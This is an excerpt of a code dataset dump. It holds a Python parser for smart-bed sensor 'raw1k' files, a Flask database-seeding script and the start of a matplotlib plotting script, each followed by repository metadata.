get_tag_id(\"TAG_SENSOR_VERSION\", tags): sensor_version,\n get_tag_id(\"TAG_ACCEL_XYZ\", tags): accel_xyz,\n get_tag_id(\"TAG_IW_STATS_QUAL\", tags): iw_stats_qual,\n get_tag_id(\"TAG_DEVICE_STATUS\", tags): device_status,\n get_tag_id(\"TAG_SENSOR_SER_NO\", tags): sensor_ser_no,\n get_tag_id(\"TAG_HRV\", tags): hrv,\n get_tag_id(\"TAG_BED_THERMAL_SETTINGS\", tags): bed_thermal_settings\n }\n # yapf: enable\n return packet_parsers\n\n\ndef get_tag_id(tag_name, tags, tag_not_found=-1):\n \"\"\" Get the tag_id given a tag name \"\"\"\n return tags.get(tag_name, {}).get(\"tag\", tag_not_found)\n\n\ndef parse_file_header(file, tags, packet_parsers, filter_input):\n \"\"\" Parse raw1k file header \"\"\"\n m_file_version = read_byte(file)\n m_endian = read_byte(file)\n m_last_packet_p1 = read_long(file)\n m_last_packet_p2 = read_long(file)\n m_eof1 = read_long(file)\n m_eof2 = read_long(file)\n header = {\n \"m_file_version\": m_file_version,\n \"m_endian\": m_endian,\n \"m_last_packet_p1\": m_last_packet_p1,\n \"m_last_packet_p2\": m_last_packet_p2,\n \"m_eof1\": m_eof1,\n \"m_eof2\": m_eof2\n }\n tag_lookup_dict = create_tag_lookup_dict(tags)\n repeat_tags = {}\n for tag_id in packet_tag_ids(file, tags):\n tag_name = tag_lookup_dict.get(tag_id, UNSUPPORTED)\n packet_parser = packet_parsers.get(tag_id, default_parser)\n if tag_name in header:\n repeat_tags[tag_id] = repeat_tags.get(tag_id, 0) + 1\n tag_name = \"{}-{}\".format(tag_name, repeat_tags[tag_id])\n\n parsed_tag = parse_tag(file, tag_id, packet_parser, packed=True)\n if filter_input and tag_name == UNSUPPORTED:\n continue\n header[tag_name] = parsed_tag\n return header\n\n\ndef avg_raw_data(**kwargs):\n \"\"\" Parse average raw data \"\"\"\n samples = int(kwargs[\"byte_length\"] / 4)\n m_avg_raw_data = []\n for _ in itertools.repeat(None, samples):\n m_avg_raw_data.append(read_int(kwargs[\"file\"]))\n return {\n 'tag': kwargs[\"tag\"],\n 'samples': samples,\n 'm_avg_raw_data': m_avg_raw_data\n }\n\n\ndef processed_avg_threshold_data(**kwargs):\n \"\"\" Parse processed average threshold data \"\"\"\n samples = int(kwargs[\"byte_length\"] / 4)\n m_avg_threshold_data = []\n for _ in itertools.repeat(None, samples):\n m_avg_threshold_data.append(read_int(kwargs[\"file\"]))\n return {\n 'tag': kwargs[\"tag\"],\n 'samples': samples,\n 'm_avg_threshold_data': m_avg_threshold_data\n }\n\n\ndef processed_pad_angle(**kwargs):\n \"\"\" Parse processed pad angle \"\"\"\n m_accel_angle = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_accel_angle': m_accel_angle}\n\n\ndef processed_presence(**kwargs):\n \"\"\" Parse processed presence \"\"\"\n m_is_in_bed = read_byte(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_is_in_bed': m_is_in_bed}\n\n\ndef device_command(**kwargs):\n \"\"\" Parse device command\"\"\"\n m_device_command = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_device_command': m_device_command}\n\n\ndef pump_status(**kwargs):\n \"\"\" Parse pump status \"\"\"\n m_serial = read_int(kwargs[\"file\"])\n m_pump_status = read_byte(kwargs[\"file\"])\n m_foundation_status = read_byte(kwargs[\"file\"])\n m_sleep_number = read_byte(kwargs[\"file\"])\n skip_bytes(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_pump_status': m_pump_status,\n 'm_foundation_status': m_foundation_status,\n 'm_sleep_number': m_sleep_number,\n 'm_serial': m_serial\n }\n\n\ndef pump_status_2(**kwargs):\n \"\"\" Parse pump status 2 \"\"\"\n m_serial = read_int(kwargs[\"file\"])\n m_pump_status = read_byte(kwargs[\"file\"])\n m_foundation_status = read_byte(kwargs[\"file\"])\n m_sleep_number = read_byte(kwargs[\"file\"])\n m_foot_angle = read_byte(kwargs[\"file\"])\n m_head_angle = read_byte(kwargs[\"file\"])\n skip_bytes(kwargs[\"file\"], 3)\n return {\n 'tag': kwargs[\"tag\"],\n 'm_pump_status': m_pump_status,\n 'm_foundation_status': m_foundation_status,\n 'm_sleep_number': m_sleep_number,\n 'm_foot_angle': m_foot_angle,\n 'm_head_angle': m_head_angle,\n 'm_serial': m_serial\n }\n\n\ndef biometrics(**kwargs):\n \"\"\" Parse biometrics \"\"\"\n m_heart_rate = read_byte(kwargs[\"file\"])\n m_respiration_rate = read_byte(kwargs[\"file\"])\n m_figure_of_merit = read_long(kwargs[\"file\"])\n skip_bytes(kwargs[\"file\"], 2)\n return {\n 'tag': kwargs[\"tag\"],\n 'm_heart_rate': m_heart_rate,\n 'm_respiration_rate': m_respiration_rate,\n 'm_figure_of_merit': m_figure_of_merit\n }\n\n\ndef processed_drift(**kwargs):\n \"\"\" parse processed drift \"\"\"\n m_drift = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_drift': m_drift}\n\n\ndef processed_snr(**kwargs):\n \"\"\" Parse processed signal to noise ratio \"\"\"\n m_snr = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_snr': m_snr}\n\n\ndef algo_init(**kwargs):\n \"\"\" Parse algorithm initialization \"\"\"\n if kwargs[\"byte_length\"]:\n skip_bytes(kwargs[\"file\"], kwargs[\"byte_length\"])\n return {'tag': kwargs[\"tag\"], 'm_is_algo_init': True}\n\n\ndef processed_data(**kwargs):\n \"\"\" Parse processed data \"\"\"\n m_version = read_int(kwargs[\"file\"])\n packet = {'tag': kwargs[\"tag\"]}\n if m_version == 3:\n packet['m_snr'] = read_int(kwargs[\"file\"])\n packet['m_drift'] = read_int(kwargs[\"file\"])\n packet['m_dyy_sum'] = read_int(kwargs[\"file\"])\n packet['m_area_2_to_5Hz'] = read_int(kwargs[\"file\"])\n packet['m_area_10_to_15Hz'] = read_int(kwargs[\"file\"])\n packet['m_area_5_to_10Hz'] = read_int(kwargs[\"file\"])\n packet['m_mse'] = read_int(kwargs[\"file\"])\n packet['m_sum_diff_ac'] = read_int(kwargs[\"file\"])\n packet['m_threshold_from_centroid'] = read_int(kwargs[\"file\"])\n packet['m_on_off_from_delta_minus_drift'] = read_int(kwargs[\"file\"])\n packet['m_delayed_on_off_by_fft_difference'] = read_int(kwargs[\"file\"])\n packet['m_armed_timer_for_auto_correct'] = read_int(kwargs[\"file\"])\n packet['m_on_off_from_pressure'] = read_int(kwargs[\"file\"])\n if kwargs[\"byte_length\"] == 66:\n packet['m_ra_status'] = read_byte(kwargs[\"file\"])\n packet['m_processed_pressure'] = read_int(kwargs[\"file\"])\n packet['m_fw_level'] = read_byte(kwargs[\"file\"])\n packet['m_fast_presence'] = read_byte(kwargs[\"file\"])\n packet['m_snore_presence'] = read_byte(kwargs[\"file\"])\n packet['m_snore_level'] = read_short(kwargs[\"file\"])\n else:\n skip_bytes(kwargs[\"file\"], kwargs[\"byte_length\"] - 4)\n return packet\n\n\ndef smart_alarm(**kwargs):\n \"\"\" Parse smart alarm \"\"\"\n m_smart_alarm_seq_num = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_smart_alarm_seq_num': m_smart_alarm_seq_num\n }\n\n\ndef xport_raw_data_footer(**kwargs):\n \"\"\" Parse xport raw data footer \"\"\"\n packet = {\n 'tag': kwargs[\"tag\"],\n 'm_smart_alarm_countdown_timer': read_short(kwargs[\"file\"])\n }\n if kwargs[\"byte_length\"] >= 3:\n packet['m_do_fast_presence'] = read_boolean(kwargs[\"file\"])\n if kwargs[\"byte_length\"] >= 4:\n packet['m_snore_enabled'] = read_byte(kwargs[\"file\"])\n return packet\n\n\ndef processed_alert(**kwargs):\n \"\"\" Parse processed alert\"\"\"\n m_alert = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_alert': m_alert}\n\n\ndef algo_version(**kwargs):\n \"\"\" Parse algo version \"\"\"\n m_algo_version = read_int(kwargs[\"file\"])\n m_algo_running_on = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_algo_version': m_algo_version,\n 'm_algo_running_on': m_algo_running_on\n }\n\n\ndef out_byedgedetect(**kwargs):\n \"\"\" Parse out by edge dectect \"\"\"\n m_out_by_edge_detect = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_out_by_edge_detect': m_out_by_edge_detect}\n\n\ndef all_fft_power(**kwargs):\n \"\"\" Parse all fft power \"\"\"\n m_all_fft_power = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_all_fft_power': m_all_fft_power}\n\n\ndef a2d_offset(**kwargs):\n \"\"\" Parse a2d offset \"\"\"\n m_atm_pressure_offset = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_atm_pressure_offset': m_atm_pressure_offset\n }\n\n\ndef info_for_algo(**kwargs):\n \"\"\" Parse information for algo \"\"\"\n m_birth_year = read_int(kwargs[\"file\"])\n m_height = read_short(kwargs[\"file\"])\n m_weight = read_short(kwargs[\"file\"])\n m_bed_type = read_byte(kwargs[\"file\"])\n m_person_type = read_byte(kwargs[\"file\"])\n m_a2d_mode = read_byte(kwargs[\"file\"])\n m_chamber_type = read_byte(kwargs[\"file\"])\n m_head_angle_from_wedge = read_byte(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_birth_year': m_birth_year,\n 'm_height': m_height,\n 'm_weight': m_weight,\n 'm_bed_type': m_bed_type,\n 'm_person_type': m_person_type,\n 'm_a2d_mode': m_a2d_mode,\n 'm_chamber_type': m_chamber_type,\n 'm_head_angle_from_wedge': m_head_angle_from_wedge\n }\n\n\ndef dsp_seq_number(**kwargs):\n \"\"\" Parse DSP sequence number \"\"\"\n m_seq_number_dsp = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_seq_number_dsp': m_seq_number_dsp}\n\n\ndef rawdata_seq_number(**kwargs):\n \"\"\" Parse Raw Data sequence number \"\"\"\n m_seq_number_raw = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_seq_number_raw': m_seq_number_raw}\n\n\ndef rdp_seq_num(**kwargs):\n \"\"\" Parse RDP sequence number \"\"\"\n m_seq_number = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_seq_number': m_seq_number}\n\n\ndef rdp_version(**kwargs):\n \"\"\" Parse RDP version \"\"\"\n m_rdp_version = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_rdp_version': m_rdp_version}\n\n\ndef dsp_timestamp(**kwargs):\n \"\"\" Parse DSP timestamp \"\"\"\n m_time_stamp_dsp = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_time_stamp_dsp': m_time_stamp_dsp}\n\n\ndef rawdata_timestamp(**kwargs):\n \"\"\" Parse Raw Data Timestamp \"\"\"\n m_time_stamp_raw = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_time_stamp_raw': m_time_stamp_raw}\n\n\ndef device_id(**kwargs):\n \"\"\" Parse Device ID \"\"\"\n m_device_id = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_device_id': m_device_id}\n\n\ndef user_id(**kwargs):\n \"\"\" Parse User ID \"\"\"\n m_user_id = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_user_id': m_user_id}\n\n\ndef parse_start_time(**kwargs):\n \"\"\" Parse Start Time \"\"\"\n m_start_time = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_start_time': m_start_time}\n\n\ndef parse_end_time(**kwargs):\n \"\"\" Parse End Time \"\"\"\n m_end_time = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_end_time': m_end_time}\n\n\ndef a2d_channels(**kwargs):\n \"\"\" Parse Number of A2D Channels \"\"\"\n m_a2d_channels = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_a2d_channels': m_a2d_channels}\n\n\ndef a2d_samples_channel(**kwargs):\n \"\"\" Parse A2D samples channel \"\"\"\n m_a2d_samples_ch = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_a2d_samples_ch': m_a2d_samples_ch}\n\n\ndef a2d_sample_period(**kwargs):\n \"\"\" Parse A2D sample period \"\"\"\n m_a2d_sample_period = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_a2d_sample_period': m_a2d_sample_period}\n\n\ndef device_config(**kwargs):\n \"\"\" Parse Device Configuration \"\"\"\n m_device_config = read_short(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_device_config': m_device_config}\n\n\ndef time_zone(**kwargs):\n \"\"\" Parse time zone \"\"\"\n m_time_zone = read_string(kwargs[\"file\"], kwargs[\"byte_length\"])\n return {'tag': kwargs[\"tag\"], 'm_time_zone': m_time_zone}\n\n\ndef is_compressed(**kwargs):\n \"\"\" Parse is compressed \"\"\"\n m_is_compressed = read_byte(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_is_compressed': m_is_compressed}\n\n\ndef hardware_version(**kwargs):\n \"\"\" Parse Hardware Version \"\"\"\n m_hardware_version = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_hardware_version': m_hardware_version}\n\n\ndef header_algo_version(**kwargs):\n \"\"\" Parse header algorithm version \"\"\"\n m_header_algo_version = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_header_algo_version': m_header_algo_version\n }\n\n\ndef header_algo_running_on(**kwargs):\n \"\"\" Parse header algorithm running on \"\"\"\n m_header_algo_running_on = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_header_algo_running_on': m_header_algo_running_on\n }\n\n\ndef header_atm_pressure_offset(**kwargs):\n \"\"\" Parse header atmospheric pressure offset \"\"\"\n m_header_atm_pressure_offset = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_header_atm_pressure_offset': m_header_atm_pressure_offset\n }\n\n\ndef header_info_for_algo(**kwargs):\n \"\"\" Parse header information for algorithm \"\"\"\n m_birth_year = read_int(kwargs[\"file\"])\n m_height = read_short(kwargs[\"file\"])\n m_weight = read_short(kwargs[\"file\"])\n m_bed_type = read_byte(kwargs[\"file\"])\n m_person_type = read_byte(kwargs[\"file\"])\n m_a2d_mode = read_byte(kwargs[\"file\"])\n m_chamber_type = read_byte(kwargs[\"file\"])\n m_head_angle_from_wedge = read_byte(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_birth_year': m_birth_year,\n 'm_height': m_height,\n 'm_weight': m_weight,\n 'm_bed_type': m_bed_type,\n 'm_person_type': m_person_type,\n 'm_a2d_mode': m_a2d_mode,\n 'm_chamber_type': m_chamber_type,\n 'm_head_angle_from_wedge': m_head_angle_from_wedge\n }\n\n\ndef last_packet_position(**kwargs):\n \"\"\" Parse last packet position \"\"\"\n m_last_packet_position = read_long(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_last_packet_position': m_last_packet_position\n }\n\n\ndef a2d_ch_data_32(**kwargs):\n \"\"\" Parse A2D channel data \"\"\"\n m_channel_number = read_int(kwargs[\"file\"])\n m_number_of_samples = int((kwargs[\"byte_length\"] - 4) / 4)\n if m_number_of_samples <= 0:\n raise ValueError(\"TAG_A2D_CH_DATA_32: number of samples not set\")\n m_samples = []\n for _ in itertools.repeat(None, m_number_of_samples):\n m_samples.append(read_int(kwargs[\"file\"]))\n return {\n 'tag': kwargs[\"tag\"],\n 'm_channel_number': m_channel_number,\n 'm_number_of_samples': m_number_of_samples,\n 'm_samples': m_samples\n }\n\n\ndef sensor_version(**kwargs):\n \"\"\" Parse sensor version \"\"\"\n types = {\n 4: 'xyz',\n 256: 'SP1',\n 512: 'SP2',\n 257: 'GVB',\n 258: '360',\n -1: 'Unknown'\n }\n m_sensor_version = read_short(kwargs[\"file\"])\n if m_sensor_version in types:\n return {\n 'tag': kwargs[\"tag\"],\n 'm_sensor_version': m_sensor_version,\n 'name': types[m_sensor_version]\n }\n return {'tag': kwargs[\"tag\"], 'm_sensor_version': m_sensor_version}\n\n\ndef accel_xyz(**kwargs):\n \"\"\" Parse Accelerometer data \"\"\"\n accel_samples = int(kwargs[\"byte_length\"] / 4)\n samples = {}\n for sample in range(0, accel_samples):\n accel_sample = read_int(kwargs[\"file\"])\n accel_x = (accel_sample >> 20) & 0x03FF\n accel_y = (accel_sample >> 10) & 0x03FF\n accel_z = (accel_sample >> 00) & 0x03FF\n samples[sample] = {\n \"accel_x\": accel_x,\n \"accel_y\": accel_y,\n \"accel_z\": accel_z,\n }\n return {\n 'tag': kwargs[\"tag\"],\n 'm_number_of_samples': accel_samples,\n 'samples': samples\n }\n\n\ndef iw_stats_qual(**kwargs):\n \"\"\" Parse wifi quality \"\"\"\n m_wifi_quality = read_short(kwargs[\"file\"])\n m_wifi_level = read_short(kwargs[\"file\"])\n m_wifi_noise = read_short(kwargs[\"file\"])\n m_set_wifi_updated = read_short(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_wifi_quality': m_wifi_quality,\n 'm_wifi_level': m_wifi_level,\n 'm_wifi_noise': m_wifi_noise,\n 'm_set_wifi_updated': m_set_wifi_updated\n }\n\n\ndef device_status(**kwargs):\n \"\"\" Parse device status \"\"\"\n fields = [\n \"PS_PUMP_STATUS\", \"PS_FND_STATUS\", \"PS_SLEEP_NUMBER\", \"PS_FOOT_ANGLE\",\n \"PS_HEAD_ANGLE\", \"PS_DUAL_TEMP_STATUS\", \"PS_DUAL_TEMP_BLOWER\",\n \"PS_HEIDI_HEATER\", \"PS_HEIDI_FAN\", \"PS_HEIDI_DIRECTION\",\n \"PS_HEIDI_TEMPERATURE\", \"PS_HEIDI_HEATER_NTS\", \"PS_HEIDI_FAN_NTS\",\n \"PS_HEIDI_DIRECTION_NTS\", \"PS_HEIDI_TEMPERATURE_NTS\",\n \"PS_HEIDI_MODE\", \"PS_HEIDI_MODE_NTS\"\n ]\n fields_index = read_byte(kwargs[\"file\"])\n value = read_byte(kwargs[\"file\"])\n if fields_index < len(fields):\n return {'tag': kwargs[\"tag\"], fields[fields_index]: value}\n return {'tag': kwargs[\"tag\"], 'field_index': fields_index, 'value': value}\n\n\ndef sensor_ser_no(**kwargs):\n \"\"\" Parse sensor serial number \"\"\"\n serial_numbers = {0: \"right\", 1: \"left\", 2: \"both\"}\n serial_number = read_int(kwargs[\"file\"])\n side = serial_numbers.get(serial_number, \"invalid\")\n return {'tag': kwargs[\"tag\"], 'sensor_serial': serial_number, 'side': side}\n\n\ndef hrv(**kwargs):\n \"\"\" Parse Heart Rate Variability \"\"\"\n dsp_seq_numb = read_int(kwargs[\"file\"])\n number_heart_beats = read_int(kwargs[\"file\"])\n sum_of_b2b = read_int(kwargs[\"file\"])\n sum_of_square_b2b = read_long(kwargs[\"file\"])\n dsp_time_stamp_gmt = read_long(kwargs[\"file\"])\n sensor_serial_number = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'dsp_seq_number': dsp_seq_numb,\n 'number_heart_beats': number_heart_beats,\n 'sum_of_b2b': sum_of_b2b,\n 'sum_of_square_b2b': sum_of_square_b2b,\n 'dsp_time_stamp_gmt': dsp_time_stamp_gmt,\n 'sensor_serial_number': sensor_serial_number\n }\n\n\ndef bed_thermal_settings(**kwargs):\n \"\"\" Parse Temperature Data \"\"\"\n serial_number = read_int(kwargs[\"file\"])\n index = read_byte(kwargs[\"file\"])\n value = read_short(kwargs[\"file\"])\n reason = read_byte(kwargs[\"file\"])\n timestamp = read_long(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'serial_number': serial_number,\n 'index': index,\n 'value': value,\n 'reason': reason,\n 'timestamp': timestamp\n }\n\n\ndef default_parser(**kwargs):\n \"\"\" Skip unsupported tags \"\"\"\n skip_bytes(kwargs[\"file\"], kwargs[\"byte_length\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'skipped': True,\n 'bytes': kwargs[\"byte_length\"]\n }\n\n\ndef filter_tags(tags, args):\n \"\"\" Filter necessary tag for further parsing \"\"\"\n return {k: v for k, v in tags.items() if str(v['tag']) in args.filter}\n\n\n##################\n# FILE MODIFIERS #\n##################\n\n\ndef truncate_raw1k(end_of_header, start_offset, end_offset, output_file_path):\n \"\"\" Truncate a raw1k file \"\"\"\n with open(output_file_path, \"r+b\") as out_file:\n LOG.info(\"Truncating to specified times.\")\n out_file.truncate(end_offset)\n out_file.seek(start_offset)\n section = out_file.read()\n out_file.truncate(end_of_header)\n out_file.seek(end_of_header)\n out_file.write(section)\n\n\ndef update_timestamp(output_file, location, time_offset):\n \"\"\" Update the time stamp of a file \"\"\"\n output_file.seek(location)\n new_time_stamp = read_long(output_file) + time_offset\n output_file.seek(location)\n write_long(output_file, new_time_stamp)\n\n\ndef update_side(output_file, location, value):\n \"\"\" Update side \"\"\"\n output_file.seek(location)\n write_int(output_file, value)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Sord27/ttt", "sub_path": "device/python/DEVICE-227/raw1k.py", "file_name": "raw1k.py", "file_ext": "py", "file_size_in_byte": 45380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 22, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 76, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 84, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 114, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 134, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 186, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 186, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 188, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 195, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 195, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 197, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 204, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 206, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 208, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 220, "usage_type": "call"}, {"api_name": "json.load", "line_number": 226, "usage_type": "call"}, {"api_name": "progress_bar.InitBarForInfile", "line_number": 236, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 253, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 253, "usage_type": "call"}, {"api_name": "progress_bar.InitBar", "line_number": 256, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 279, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 314, "usage_type": "attribute"}, {"api_name": "progress_bar.InitBarForInfile", "line_number": 318, "usage_type": "call"}, {"api_name": "struct.error", "line_number": 421, "usage_type": "attribute"}, {"api_name": "gzip.decompress", "line_number": 452, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 454, "usage_type": "call"}, {"api_name": "progress_bar.InitBar", "line_number": 472, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 480, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 483, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 498, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 506, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 506, "usage_type": "attribute"}, {"api_name": "datetime.datetime.combine", "line_number": 513, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 513, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 514, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 515, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 515, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 528, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 528, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 529, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 530, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 530, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 531, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 542, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 547, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 557, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 562, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 582, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 588, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 697, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 710, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 1087, "usage_type": "call"}]} +{"seq_id": "23935231603", "text": "from flask_script import Manager\nfrom flask_migrate import Migrate, Manager, MigrateCommand\nfrom sqlalchemy.orm import Session\n\nfrom app import APP\nfrom models import db, Actor, Movie, CareerModel\n\nmigrate = Migrate(APP, db)\nmanager = Manager(APP)\n\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef seed_base():\n \"Add seed data to the database\"\n\n session = Session()\n\n actor1 = Actor('Actor1', 20, 'female')\n actor2 = Actor('Actor2', 23, 'male')\n actor3 = Actor('Actor3', 43, 'male')\n\n movie1 = Movie('Movie1', '2017-10-12')\n movie2 = Movie('Movie2', '2017-10-12')\n movie3 = Movie('Movie1', '2017-10-12')\n\n objects = [actor1, actor2, actor3, movie1, movie2, movie3]\n\n db.session.bulk_save_objects(objects)\n db.session.commit()\n\n\n@manager.command\ndef seed_relationship():\n\n career_model11 = CareerModel(1, 1)\n career_model12 = CareerModel(1, 2)\n career_model13 = CareerModel(1, 3)\n career_model21 = CareerModel(2, 1)\n career_model31 = CareerModel(3, 1)\n\n objects = [career_model11, career_model12, career_model13,\n career_model21, career_model31]\n\n db.session.bulk_save_objects(objects)\n db.session.commit()\n\n\nif __name__ == '__main__':\n manager.run()\n", "repo_name": "OvieMudi/capstone", "sub_path": "manage.py", "file_name": "manage.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask_migrate.Migrate", "line_number": 8, "usage_type": "call"}, {"api_name": "app.APP", "line_number": 8, "usage_type": "argument"}, {"api_name": "models.db", "line_number": 8, "usage_type": "argument"}, {"api_name": "flask_migrate.Manager", "line_number": 9, "usage_type": "call"}, {"api_name": "app.APP", "line_number": 9, "usage_type": "argument"}, {"api_name": "flask_migrate.MigrateCommand", "line_number": 11, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Actor", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Actor", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Actor", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Movie", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Movie", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Movie", "line_number": 26, "usage_type": "call"}, {"api_name": "models.db.session.bulk_save_objects", "line_number": 30, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 30, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 31, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 31, "usage_type": "name"}, {"api_name": "models.CareerModel", "line_number": 37, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 38, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 39, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 40, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 41, "usage_type": "call"}, {"api_name": "models.db.session.bulk_save_objects", "line_number": 46, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 46, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 47, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "34529419881", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.colors as colors\nimport matplotlib.cm as cm\nfrom matplotlib.ticker import NullFormatter,FormatStrFormatter,FuncFormatter,FixedFormatter,LinearLocator,MultipleLocator,IndexLocator\n\ndef gen_x(n):\n ret = []\n x = np.arange(0, n, 1, dtype=np.int8) #[0,1,2,3,...n 0,1,2,3,...n]\n while n > 0:\n ret.extend(x) \n n-=1 \n return ret\n\ndef gen_y(n):\n ret = []\n indx = 0\n while indx < n:\n 